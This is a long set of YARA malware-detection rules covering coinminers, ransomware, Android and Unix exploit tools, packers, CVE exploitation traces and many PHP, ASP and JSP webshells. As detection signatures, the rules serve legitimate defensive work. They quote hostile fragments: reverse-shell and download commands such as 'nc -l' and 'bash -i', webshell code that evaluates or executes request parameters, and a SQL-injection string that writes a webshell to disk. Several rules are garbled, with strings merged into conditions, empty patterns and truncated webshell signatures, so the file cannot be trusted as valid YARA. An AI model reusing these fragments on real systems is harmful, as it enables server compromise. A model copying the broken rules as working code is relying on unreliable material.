rule Multios_Coinminer_StratumIoc { strings: $a1 = "stratum+tcp" $a2 = "stratum+udp" $a3 = "stratum+ssl" $a4 = "ethproxy+tcp" $a5 = "nicehash+tcp" condition: any of them } rule Multios_Ransome_BlackMatter { strings: $s1 = "Another Instance Currently Running..." $s2 = "Removing Self Executable..." $s3 = "web_reporter::main_sender_proc()" $s4 = "NO stat available for " $s5 = "Please, just wait..." $s6 = ".cfgETD" condition: all of them } rule Multios_Coinminer_StratumProtocol { strings: $a1 = "stratum+tcp" $a2 = "stratum+udp" $a3 = "stratum+ssl" $a4 = "ethproxy+tcp" $a5 = "nicehash+tcp" condition: any of them } rule Multios_Coinminer_MinerKeywords { strings: $m1 = "Miner" $m2 = "miner" $s1 = "Stratum" $s2 = "stratum" $e1 = "encrypt" $e2 = "Encrypt" condition: ($s1 or $s2) and ($m1 or $m2) and ($e1 or $e2) } rule Multios_Coinminer_NameIoc { strings: $k01 = "_ZN5Miner" $k02 = "_ZN5miner" $k11 = "NBMiner" $k21 = "_ZN5xmrig" $k22 = "_ZN5Xmrig" condition: any of them } rule Multios_Trojan_Stowaway { strings: $k1 = "Stowaway" condition: $k1 } rule Unix_Packer_MumblehardM1 { strings: $decrypt = { 31 db [1-10] ba ?? 00 00 00 [0-10] (56 5f | 89 F7) 39 d3 75 13 81 fa ?? (00 | 01) 00 00 75 02 31 d2 81 c2 ?? 
00 00 00 31 db 43 ac 30 d8 aa 43 e2 e2 } condition: $decrypt } rule Unix_Spyware_Suspicious_script { strings: $kill1 = "kill -9" $kill2 = "killall" $kill3 = "pkill -f" $remove1 = "rm -f" $remove2 = "rm -rf" $download1 = "wget " $download2 = "curl " $download3 = "tftp " $iptables1 = "iptables -A" $iptables2 = "iptables -F" $has_sensitive_file1 = "/root" $has_sensitive_file2 = "/etc/cron" $has_sensitive_file3 = "/.ssh" $has_sensitive_file4 = "system" $has_sensitive_file5 = "/usr/bin/passwd" $sensitive_ops1 = "chmod 777 " $sensitive_ops2 = "setsid" $sensitive_ops3 = "chattr -i" $sensitive_ops4 = "nohup" $sensitive_ops6 = "netcat -l" $bad_ops1 = "nc -l" $bad_ops2 = "bash -i" $sensitive_ops9 = "ulimit -n" $root1 = "insmod" $root2 = "modprobe" $root3 = "sysctl -w" $root4 = "wrmsr -a" condition: uint32(0) != 0x464c457f and filesize < 256KB and ( (8 of them) or $bad_ops1 or $bad_ops2 ) } rule Andr_Exploit_ExploitTools { strings: $s0 = "stack corruption detected: aborted" fullword ascii $s1 = "/proc/%d/fd/%d" fullword ascii $s2 = "SUCCESS: Enjoy the shell." fullword ascii condition: uint16(0) == 0x457f and 2 of them } rule Unix_Spyware_EquationGroup_morerats_client_Store { strings: $s1 = "[-] Failed to mmap file: %s" fullword ascii $s2 = "[-] can not NULL terminate input data" fullword ascii $s3 = "Missing argument for `-x'." fullword ascii $s4 = "[!] Value has size of 0!" fullword ascii condition: uint16(0) == 0x457f and filesize < 60KB and 2 of them } rule Andr_Exploit_Gingerbreak_unlocking_tools { strings: $s1 = "Android Exploid Crew." $s2 = "Killing ADB and restarting as root... enjoy!" 
$s3 = "GingerBread" condition: uint16(0) == 0x457f and 2 of them } rule Andr_Exploit_Droidkungfu { strings: $s1 = "/system/bin/kill -9 %s" $s2 = "%s/myicon" $s3 = "%s/secbin" $s4 = "/system/bin/secbin" condition: uint16(0) == 0x457f and all of them } rule Unix_Exploit_PsyBNC { strings: $s1 = "psychoid Exp" $s2 = "(%s)!psyBNC@lam3rz.de PRIVMSG %s :%s" condition: uint16(0) == 0x457f and all of them } rule Andr_Exploit_ToolsZerglings { strings: $s0 = "Overseer found a path ! 0x%08x" fullword ascii $s1 = "Killing ADB and restarting as root... enjoy!" fullword ascii $s2 = "Zerglings" fullword ascii condition: uint16(0) == 0x457f and 2 of them } rule Unix_Spyware_Bouncer { strings: $s1 = "/shutdown_request\">Shutdown Bouncer" $s2 = "Bouncer Successfully Shutdown" $s3 = "%s Bouncer Daemonized (PID = %d)" condition: uint16(0) == 0x457f and all of them } rule Unix_CVE_2021_40539 { strings: $x1 = "/ServletApi/../RestApi/LogonCustomization" ascii wide $x2 = "/ServletApi/../RestAPI/Connection" ascii wide condition: filesize < 50MB and 1 of them } rule Js_OBFUSC_SUSP_JS_Sept21_2_RID2E68 { strings: $s1 = "=new RegExp(String.fromCharCode(" ascii $s2 = ".charCodeAt(" ascii $s3 = ".substr(0, " ascii $s4 = "var shell = new ActiveXObject(" ascii $s5 = "= new Date().getUTCMilliseconds();" ascii $s6 = ".deleteFile(WScript.ScriptFullName);" ascii condition: filesize < 6000KB and ( 4 of them ) } rule Unix_CVE_2021_26084 { strings: $xr1 = /isSafeExpression Unsafe clause found in \['[^\n]{1,64}\\u0027/ ascii $xs1 = "[util.velocity.debug.DebugReferenceInsertionEventHandler] referenceInsert resolving reference [$!queryString]" $xs2 = "userName: anonymous | action: createpage-entervariables ognl.ExpressionSyntaxException: Malformed OGNL expression: '\\' [ognl.TokenMgrError: Lexical error at line 1" $sa1 = "GET /pages/doenterpagevariables.action" $sb1 = "%5c%75%30%30%32%37" $sb2 = "\\u0027" $sc1 = " ERROR " $sc2 = " | userName: anonymous | action: createpage-entervariables" $re1 = 
/\[confluence\.plugins\.synchrony\.SynchronyContextProvider\] getContextMap (\n )?-- url: \/pages\/createpage-entervariables\.action/ condition: 1 of ( $x* ) or ( $sa1 and 1 of ( $sb* ) ) or ( all of ( $sc* ) and $re1 ) } rule Multios_CVE_2021_33766 { strings: $ss0 = "POST " ascii $ss1 = " 500 0 0" $sa1 = "/ecp/" ascii $sa2 = "/RulesEditor/InboxRules.svc/NewObject" ascii $sb1 = "/ecp/" ascii $sb2 = "SecurityToken=" ascii condition: all of ( $ss* ) and ( all of ( $sa* ) or all of ( $sb* ) ) } rule Unix_Trojan_TinyShell { strings: $vara01 = { 73 3A 70 3A 00 } $vara02 = { 55 74 61 67 65 3A 20 25 73 } $vara03 = { 5B 20 2D 73 20 73 65 63 72 65 74 20 5D } $vara04 = { 5B 20 2D 70 20 70 6F 72 74 20 5D } $varb01 = { 41 57 41 56 41 55 41 54 55 53 0F B6 06 } $varb02 = { 48 C7 07 00 00 00 00 48 C7 47 08 00 00 } $vard01 = { 55 48 89 E5 41 57 41 56 41 55 41 54 53 } $vard02 = { 55 48 89 E5 48 C7 47 08 00 00 00 00 48 } $varb03 = { 89 DF E8 FB A4 FF FF 83 C3 01 81 FB 00 04 } $vard03 = { 66 89 05 7D 5E 00 00 } $vare01 = "socket" $vare02 = "connect" $vare03 = "alarm" $vare04 = "dup2" $vare05 = "execl" $vare06 = "openpty" $vare07 = "putenv" $vare08 = "setsid" $vare09 = "ttyname" $vare00 = "waitpid" $varc01 = "HISTFIL" $varc02 = "TERML" $varc03 = "/bin/sh" condition: (uint16(0) == 0x457f) and (all of ($vara*)) and ( filesize > 20KB or ( filesize < 100KB and ( (2 of ($varb*) or 2 of ($vard*)) or (1 of ($varb0*)) or (5 of ($vare*) or 2 of ($varc*)) ) ) ) } rule Unix_DDOS_Kaiten { strings: $irc = /(PING)|(PONG)|(NOTICE)|(PRIVMSG)/ $kill = "Killing pid %d" nocase $subnet = "What kind of subnet address is that" nocase $version = /(Helel mod)|(Kaiten wa goraku)/ $flood = "UDP " nocase condition: uint16(0) == 0x457f and $irc and 2 of ($kill, $subnet, $version, $flood) } rule Unix_Malware_HttpsdARM { strings: $hexsts01 = { f0 4f 2d e9 1e db 4d e2 ec d0 4d e2 01 40 a0 e1 } $hexsts02 = { f0 45 2d e9 0b db 4d e2 04 d0 4d e2 3c 01 9f e5 } $hexsts03 = { f0 45 2d e9 01 db 4d e2 04 d0 4d e2 bc 01 9f 
e5 } $st01 = "k.conectionapis.com" fullword nocase wide ascii $st02 = "key=%s&host_name=%s&cpu_count=%d&os_type=%s&core_count=%s" fullword nocase wide ascii $st03 = "id=%d&result=%s" fullword nocase wide ascii $st04 = "rtime" fullword nocase wide ascii $st05 = "down" fullword nocase wide ascii $st06 = "cmd" fullword nocase wide ascii $st07 = "0 */6 * * * root" fullword nocase wide ascii $st08 = "/etc/cron.d/httpsd" fullword nocase wide ascii $st09 = "cat /proc/cpuinfo |grep processor|wc -l" fullword nocase wide ascii $st10 = "k.conectionapis.com" fullword nocase wide ascii $st11 = "/api" fullword nocase wide ascii $st12 = "/tmp/.httpslog" fullword nocase wide ascii $st13 = "/bin/.httpsd" fullword nocase wide ascii $st14 = "/tmp/.httpsd" fullword nocase wide ascii $st15 = "/tmp/.httpspid" fullword nocase wide ascii $st16 = "/tmp/.httpskey" fullword nocase wide ascii condition: uint16(0) == 0x457f and filesize < 200KB and all of them } rule Unix_Malware_Httpsdi86 { strings: $hexsts01 = { 8d 4c 24 04 83 e4 f0 ff 71 fc 55 89 e5 57 56 53 } $hexsts02 = { 55 89 e5 57 56 53 81 ec 14 2c 00 00 68 7a 83 05 } $hexsts03 = { 55 89 e5 57 56 53 81 ec 10 04 00 00 68 00 04 00 } $st01 = "k.conectionapis.com" fullword nocase wide ascii $st02 = "key=%s&host_name=%s&cpu_count=%d&os_type=%s&core_count=%s" fullword nocase wide ascii $st03 = "id=%d&result=%s" fullword nocase wide ascii $st04 = "rtime" fullword nocase wide ascii $st05 = "down" fullword nocase wide ascii $st06 = "cmd" fullword nocase wide ascii $st07 = "0 */6 * * * root" fullword nocase wide ascii $st08 = "/etc/cron.d/httpsd" fullword nocase wide ascii $st09 = "cat /proc/cpuinfo |grep processor|wc -l" fullword nocase wide ascii $st10 = "k.conectionapis.com" fullword nocase wide ascii $st11 = "/api" fullword nocase wide ascii $st12 = "/tmp/.httpslog" fullword nocase wide ascii $st13 = "/bin/.httpsd" fullword nocase wide ascii $st14 = "/tmp/.httpsd" fullword nocase wide ascii $st15 = "/tmp/.httpspid" fullword nocase wide ascii 
$st16 = "/tmp/.httpskey" fullword nocase wide ascii condition: (uint16(0) == 0x457f) and (filesize < 200KB) and (all of them) } rule Unix_Packer_UpxDetail { strings: $a1 = "UPX!" $a2 = " UPX " $a3 = "!XPU" $h1 = { E8 ?? ?? ?? ?? 55 53 51 52 48 01 FE 56 41 ?? ?? ?? 0F 85 ?? ?? ?? ?? 55 48 89 E5 44 8B 09 49 89 D0 48 89 F2 48 8D 77 02 56 8A 07 FF CA 88 C1 } $h2 = { E8 ?? ?? ?? ?? 55 53 51 52 48 01 FE 56 48 89 FE 48 89 D7 31 DB 31 C9 48 83 CD FF E8 ?? ?? ?? ?? 01 DB 74 ?? F3 C3 8B 1E 48 83 EE FC 11 DB 8A } $h3 = { E8 ?? ?? ?? ?? EB 0E 5A 58 59 97 60 8A 54 24 20 E9 11 0B 00 00 60 8B 74 24 24 8B 7C 24 2C 83 CD FF 89 E5 8B 55 28 AC 4A 88 C1 24 07 C0 E9 03 BB 00 FD FF FF D3 E3 8D A4 5C 90 F1 FF FF 83 E4 E0 6A 00 6A } $h4 = { FC 41 5B 41 80 F8 ?? 74 0D E9 ?? ?? ?? ?? 48 FF C6 88 17 48 FF C7 8A 16 01 DB 75 0A 8B 1E 48 83 EE FC 11 DB 8A 16 72 E6 8D 41 01} condition: uint32(0) == 0x464c457f and any of them } rule Unix_Malware_RebirthVulcan { strings: $spec01 = "vulcan.sh" fullword nocase wide ascii $spec02 = "Vulcan" fullword nocase wide ascii $str01 = "/usr/bin/python" fullword nocase wide ascii $str02 = "nameserver 8.8.8.8\nnameserver 8.8.4.4\n" fullword nocase wide ascii $str03 = "Telnet Range %d->%d" fullword nocase wide ascii $str04 = "Mirai Range %d->%d" fullword nocase wide ascii $str05 = "[Updating] [%s:%s]" fullword nocase wide ascii $str06 = "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*" fullword nocase wide ascii $str07 = "\x1B[96m[DEVICE] \x1B[97mConnected" fullword nocase wide ascii $hex01 = { 0D C0 A0 E1 00 D8 2D E9 } $hex02 = { 3C 1C 00 06 27 9C 97 98 } $hex03 = { 94 21 EF 80 7C 08 02 A6 } $hex04 = { E6 2F 22 4F 76 91 18 3F } $hex05 = { 06 00 1C 3C 20 98 9C 27 } $hex06 = { 55 89 E5 81 EC ?? 
10 00 } $hex07 = { 55 48 89 E5 48 81 EC 90 } $hex08 = { 6F 67 69 6E 00 } $bot01 = "MIRAITEST" fullword nocase wide ascii $bot02 = "TELNETTEST" fullword nocase wide ascii $bot03 = "UPDATE" fullword nocase wide ascii $bot04 = "PHONE" fullword nocase wide ascii $bot05 = "RANGE" fullword nocase wide ascii $bot06 = "KILLATTK" fullword nocase wide ascii $bot07 = "STD" fullword nocase wide ascii $bot08 = "BCM" fullword nocase wide ascii $bot09 = "NETIS" fullword nocase wide ascii $bot10 = "FASTLOAD" fullword nocase wide ascii condition: uint32(0) == 0x464c457f and filesize < 300KB and all of ($spec*) and 4 of ($str*) and 2 of ($hex*) and 6 of ($bot*) } rule Unix_CVE_2021_38647 { strings: $a1 = "/opt/omi/bin/omiagent" ascii fullword $s1 = "OMI-1.6.8-0 - " ascii $s2 = "OMI-1.6.6-0 - " ascii $s3 = "OMI-1.6.4-1 - " ascii $s4 = "OMI-1.6.4-0 - " ascii $s5 = "OMI-1.6.2-0 - " ascii $s6 = "OMI-1.6.1-0 - " ascii $s7 = "OMI-1.5.0-0 - " ascii $s8 = "OMI-1.4.4-0 - " ascii $s9 = "OMI-1.4.3-2 - " ascii $s10 = "OMI-1.4.3-1 - " ascii $s11 = "OMI-1.4.3-0 - " ascii $s12 = "OMI-1.4.2-5 - " ascii $s13 = "OMI-1.4.2-4 - " ascii $s14 = "OMI-1.4.2-3 - " ascii $s15 = "OMI-1.4.2-2 - " ascii $s16 = "OMI-1.4.2-1 - " ascii $s17 = "OMI-1.4.1-1 - " ascii $s18 = "OMI-1.4.1-0 - " ascii $s19 = "OMI-1.4.0-6 - " ascii condition: uint32(0) == 0x464c457f and $a1 and 1 of ( $s* ) } rule Multios_HKTL_KhepriBeaconRID3027 { strings: $x1 = "NT %d.%d Build %d ProductType:%s" ascii fullword $xe1 = "YzIuQ01EUEFSQU0uY21k" ascii $xe2 = "MyLkNNRFBBUkFNLmNtZ" ascii $xe3 = "jMi5DTURQQVJBTS5jbW" ascii $sx1 = "c2.ProcessItem.user" ascii fullword $sx2 = "c2.CMDPARAM.cmd" ascii fullword $sx3 = "c2.DownLoadFile.file_path" ascii fullword $sa1 = "file size zero" $sa2 = "cmd.exe /c " $sa3 = "error parse param" $sa4 = "innet_ip" $op1 = { c3 b9 b4 98 49 00 87 01 5d c3 b8 b8 98 49 00 c3 8b ff } $op2 = { 8b f1 80 3d 58 97 49 00 00 0f 85 96 00 00 00 33 c0 40 b9 50 97 49 00 87 01 33 db } $op3 = { 90 d5 0c 43 00 34 0d 43 00 ea 0c 43 00 
7e 0d 43 00 b6 0d 43 00 cc } $op4 = { 69 c0 ff 00 00 00 8b 4d c0 23 88 40 7c 49 00 89 4d c0 8b 45 cc 0b 45 c0 89 45 cc 8b 45 d0 } condition: ( uint16 (0) == 0x5a4d or uint32(0) == 0x464c457f ) and filesize < 2000KB and ( 1 of ( $x* ) or 2 of ( $sx* ) or all of ( $sa* ) or 3 of ( $op* ) ) or ( filesize < 10MB and 1 of ( $xe* ) ) or 5 of them } rule Js_Packer_JJEncoder { strings: $jjencode = /(\$|[\S]+)=~\[\]\;(\$|[\S]+)\=\{[\_]{3}\:[\+]{2}(\$|[\S]+)\,[\$]{4}\:\(\!\[\]\+["]{2}\)[\S]+/ fullword condition: $jjencode } rule Win_Packer_Emotet { strings: $pdb1 = "123EErrrtools.pdb" $pdb2 = "gGEW\\F???/.pdb" condition: uint16 (0) == 0x5a4d and $pdb1 or $pdb2 } rule Win_Packer_ZbotBanker { strings: $a = "__SYSTEM__" wide $b = "*tanentry*" $c = "* 3 and #b > 3 and #c > 3 and #d > 3 and #e > 3) } rule Win_Packer_Borland { strings: $patternBorland = "Borland" wide ascii condition: uint16 (0) == 0x5a4d and $patternBorland } rule Win_Packer_EnigmaProtector1XSukhovVladimirSergeNMarkin { strings: $a0 = { 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 00 00 00 52 65 67 43 6C 6F 73 65 4B 65 79 00 00 00 53 79 73 46 72 65 65 53 74 72 69 6E 67 00 00 00 43 72 65 61 74 65 46 6F 6E 74 41 00 00 00 53 68 65 6C 6C 45 78 65 63 75 74 65 41 00 00 } condition: uint16 (0) == 0x5a4d and $a0 } rule Win_Packer_MSLRHv032afakePCGuard4xxemadicius { strings: $a0 = { FC 55 50 E8 00 00 00 00 5D EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 58 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 
F6 FF FF FF E8 F2 FF FF FF } condition: uint16 (0) == 0x5a4d and $a0 } rule Win_Packer_SPLayerv008 { strings: $a0 = { 8D 40 00 B9 [4] 6A ?? 58 C0 0C [2] 48 [2] 66 13 F0 91 3B D9 [8] 00 00 00 00 } condition: uint16 (0) == 0x5a4d and $a0 } rule Win_Packer_DxPackV086Dxd { strings: $a0 = { 60 E8 00 00 00 00 5D 8B FD 81 ED 06 10 40 00 2B BD 94 12 40 00 81 EF 06 00 00 00 83 BD 14 13 40 00 01 0F 84 2F 01 00 00 } condition: uint16 (0) == 0x5a4d and $a0 } rule Win_Packer_AnskyaNTPackerGeneratorAnskya { strings: $a0 = { 55 8B EC 83 C4 F0 53 B8 88 1D 00 10 E8 C7 FA FF FF 6A 0A 68 20 1E 00 10 A1 14 31 00 10 50 E8 71 FB FF FF 8B D8 85 DB 74 2F 53 A1 14 31 00 10 50 E8 97 FB FF FF 85 C0 74 1F 53 A1 14 31 00 10 50 E8 5F FB FF FF 85 C0 74 0F 50 E8 5D FB FF FF 85 C0 74 05 E8 70 FC FF FF 5B E8 F2 F6 FF FF 00 00 48 45 41 52 54 } condition: uint16 (0) == 0x5a4d and $a0 } rule Win_Packer_EmbedPEV100V124cyclotron { strings: $a0 = { 00 00 00 00 [4] 00 00 00 00 00 00 00 00 [8] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [12] 00 00 00 00 [12] 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 00 00 00 00 00 } condition: uint16 (0) == 0x5a4d and $a0 } rule Asp_Webshell_Laudanum_File { strings: $s1 = "' *** Written by Tim Medin " fullword ascii $s2 = "Response.BinaryWrite(stream.Read)" fullword ascii $s3 = "Response.Write(Response.Status & Request.ServerVariables(\"REMOTE_ADDR\"))" fullword ascii $s4 = "%>\">web root
<%" fullword ascii $s5 = "set folder = fso.GetFolder(path)" fullword ascii $s6 = "Set file = fso.GetFile(filepath)" fullword ascii condition: filesize < 30KB and uint16(0) == 0x253c and 5 of them } rule Asp_Webshell_Laudanum_Shell { strings: $s1 = "
" fullword ascii $s2 = "%ComSpec% /c dir" fullword ascii $s3 = "Set objCmd = wShell.Exec(cmd)" fullword ascii $s4 = "Server.ScriptTimeout = 180" fullword ascii $s5 = "cmd = Request.Form(\"cmd\")" fullword ascii $s6 = "' *** http://laudanum.secureideas.net" fullword ascii $s7 = "Dim wshell, intReturn, strPResult" fullword ascii condition: filesize < 15KB and 4 of them } rule Php_Webshell_Laudanum_Killnc { strings: $s1 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii $s2 = "header(\"HTTP/1.0 404 Not Found\");" fullword ascii $s3 = "" fullword ascii $s4 = "Laudanum Kill nc" fullword ascii $s5 = "foreach ($allowedIPs as $IP) {" fullword ascii condition: filesize < 15KB and 4 of them } rule Php_Webshell_Laudanum_Settings { strings: $s1 = "Port: " fullword ascii $s2 = "
  • Reverse Shell - " fullword ascii $s3 = "
  • \">File Browser" ascii condition: filesize < 13KB and all of them } rule Asp_Webshell_Laudanum_Proxy { strings: $s1 = "'response.write \"
    -value:\" & request.querystring(key)(j)" fullword ascii $s2 = "q = q & \"&\" & key & \"=\" & request.querystring(key)(j)" fullword ascii $s3 = "for each i in Split(http.getAllResponseHeaders, vbLf)" fullword ascii $s4 = "'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)" fullword ascii $s5 = "s = urlscheme & urlhost & urlport & urlpath" fullword ascii $s6 = "Set http = Server.CreateObject(\"Microsoft.XMLHTTP\")" fullword ascii condition: filesize < 50KB and all of them } rule Cfm_Webshell_Laudanum_Shell { strings: $s1 = "Executable:
    " fullword ascii $s2 = "" fullword ascii $s3 = "" fullword ascii condition: filesize < 20KB and 2 of them } rule Asp_Webshell_Laudanum_Shellx { strings: $s1 = "command_hist[current_line] = document.shell.command.value;" fullword ascii $s2 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword ascii $s3 = "array_unshift($_SESSION['history'], $command);" fullword ascii $s4 = "if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {" condition: filesize < 40KB and all of them } rule Asp_Webshell_ChinaChopper { strings: $ChinaChopperASPX = {25 40 20 50 61 67 65 20 4C 61 6E 67 75 61 67 65 3D ?? 4A 73 63 72 69 70 74 ?? 25 3E 3C 25 65 76 61 6C 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-100] 75 6E 73 61 66 65} condition: $ChinaChopperASPX } rule Php_Webshell_ChinaChopper { strings: $ChinaChopperPHP = {3C 3F 70 68 70 20 40 65 76 61 6C 28 24 5F 50 4F 53 54 5B ?? 70 61 73 73 77 6F 72 64 ?? 5D 29 3B 3F 3E} condition: $ChinaChopperPHP } rule Php_Webshell_Dotico { strings: $php = " 70KB and $php at 0 and filesize < 110KB and $regexp } rule Php_Trojan_Anuna { strings: $a = /<\?php \$[a-z]+ = '/ $b = /\$[a-z]+=explode\(chr\(\([0-9]+[-+][0-9]+\)\)/ $c = /\$[a-z]+=\([0-9]+[-+][0-9]+\)/ $d = /if \(!function_exists\('[a-z]+'\)\)/ condition: all of them } rule Jsp_Webshell_webshell_jsp_by_string { strings: $jstring1 = "Boot Shell" wide ascii $jstring2 = "String oraPWD=\"" wide ascii $jstring3 = "Owned by Chinese Hackers!" 
wide ascii $jstring4 = "AntSword JSP" wide ascii $jstring5 = "JSP Webshell" wide ascii $jstring15 = "Runtime.getRuntime().exec(request.getParameter(" nocase wide ascii $jstring16 = "GIF98a<%@page" wide ascii $jstring17 = "ClassLoader" condition: any of ( $jstring* ) } rule Php_Webshell_webshell_behinder { strings: $token0 = "e45e329feb5d925b" $token1 = "rebeyond" condition: any of($token*) } rule Php_Webshell_webshell_php_obfuscated_tiny { strings: $obf1 = /\w'\.'\w/ ascii $obf2 = /\w\"\.\"\w/ ascii $obf3 = "].$" wide ascii $gfp1 = "eval(\"return [$serialised_parameter" // elgg $gfp2 = "$this->assert(strpos($styles, $" $gfp3 = "$module = new $_GET['module']($_GET['scope']);" $gfp4 = "$plugin->$_POST['action']($_POST['id']);" $gfp5 = "$_POST[partition_by]($_POST[" $gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);" $gfp7 = "The above example code can be easily exploited by passing in a string such as" // ... ;) $gfp8 = "Smarty_Internal_Debug::start_render($_template);" $gfp9 = "?p4yl04d=UNION%20SELECT%20'',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php" $gfp10 = "[][}{;|]\\|\\\\[+=]\\|?" $gfp11 = "(eval (getenv \"EPROLOG\")))" $gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ" $php_short = " 2 or #obf3 > 10 ) } rule Php_Webshell_ChinaChopper_Generic { strings: $x_aspx = /%@\sPage\sLanguage=.Jscript.%><%eval\(RequestItem\[.{,100}unsafe/ $x_php = / 570 and filesize < 800 } rule Php_Webshell_webshell_h4ntu_shell_powered_by_tsoi_ { strings: $s0 = "
    Server Adress:User Info: ui" $s4 = "
    : \".mysql_error().\"$f_" $s4 = "print \"Current Directory" $s4 = "

    " fullword condition: 2 of them } rule Php_Webshell_webshell_iMHaPFtp_2 { strings: $s8 = "if ($l) echo '
    \"+strCut(convertPath(list[i].getPath()),7" $s3 = " \"reg add \\\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control" condition: all of them } rule Php_Webshell_webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 { strings: $s0 = "die(\"\\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\\n" $s1 = "Mode Shell v1.0[\" (left bracket), \"|\" (pi" $s3 = "word: \"null\", \"yes\", \"no\", \"true\"," condition: 1 of them } rule Php_Webshell_webshell_PHPRemoteView { strings: $s2 = "" fullword $s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\"" condition: all of them } rule Php_Webshell_webshell_caidao_shell_guo { strings: $s0 = "
    \\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n" condition: 1 of them } rule Asp_Webshell_webshell_asp_cmd { strings: $s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword $s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword $s3 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword condition: 1 of them } rule Php_Webshell_webshell_php_sh_server { strings: $s0 = "eval(getenv('HTTP_CODE'));" fullword condition: all of them } rule Php_Webshell_webshell_PH_Vayv_PH_Vayv { strings: $s0 = "style=\"BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in" $s4 = "SHOPEN
    " fullword condition: all of them } rule Php_Webshell_webshell_cihshell_fix { strings: $s7 = "" fullword $s8 = "" fullword condition: all of them } rule Php_Webshell_webshell_Private_i3lue { strings: $s8 = "case 15: $image .= \"\\21\\0\\" condition: all of them } rule Php_Webshell_webshell_php_up { strings: $s0 = "copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);" fullword $s3 = "if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {" fullword $s8 = "echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];" fullword condition: 2 of them } rule Php_Webshell_webshell_Mysql_interface_v1_0 { strings: $s0 = "echo \"Go Execute
    All the data in these tables:
    \".$tblsv.\" were putted " condition: all of them } rule Php_Webshell_webshell_Server_Variables { strings: $s7 = "<% For Each Vars In Request.ServerVariables %>" fullword $s9 = "Variable Name

    " fullword condition: all of them } rule Php_Webshell_webshell_caidao_shell_ice_2 { strings: $s0 = "" fullword condition: all of them } rule Php_Webshell_webshell_caidao_shell_mdb { strings: $s1 = "<% execute request(\"ice\")%>a " fullword condition: all of them } rule Jsp_Webshell_webshell_jsp_guige { strings: $s0 = "if(damapath!=null &&!damapath.equals(\"\")&&content!=null" condition: all of them } rule Php_Webshell_webshell_phpspy2010 { strings: $s3 = "eval(gzinflate(base64_decode(" $s5 = "//angel" fullword $s8 = "$admin['cookiedomain'] = '';" fullword condition: all of them } rule Asp_Webshell_webshell_asp_ice { strings: $s0 = "D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC" condition: all of them } rule Php_Webshell_webshell_drag_system { strings: $s9 = "String sql = \"SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_" condition: all of them } rule Asp_Webshell_webshell_DarkBlade1_3_asp_indexx { strings: $s3 = "Const strs_toTransform=\"command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou" condition: all of them } rule Php_Webshell_webshell_phpshell3 { strings: $s2 = "" fullword condition: all of them } rule Asp_Webshell_webshell_asp_404 { strings: $s0 = "lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2" condition: all of them } rule Php_Webshell_webshell_webshell_cnseay02_1 { strings: $s0 = "(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU" condition: all of them } rule Php_Webshell_webshell_php_fbi { strings: $s7 = "erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo" condition: all of them } rule Php_Webshell_webshell_B374kPHP_B374k { strings: $s0 = "Http://code.google.com/p/b374k-shell" fullword $s1 = "$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'" $s3 = "Jayalah Indonesiaku & Lyke @ 2013" fullword $s4 = "B374k Vip In Beautify Just For Self" fullword condition: 1 of them } rule Asp_Webshell_webshell_cmd_asp_5_1 { strings: $s9 = "Call oS.Run(\"win.com 
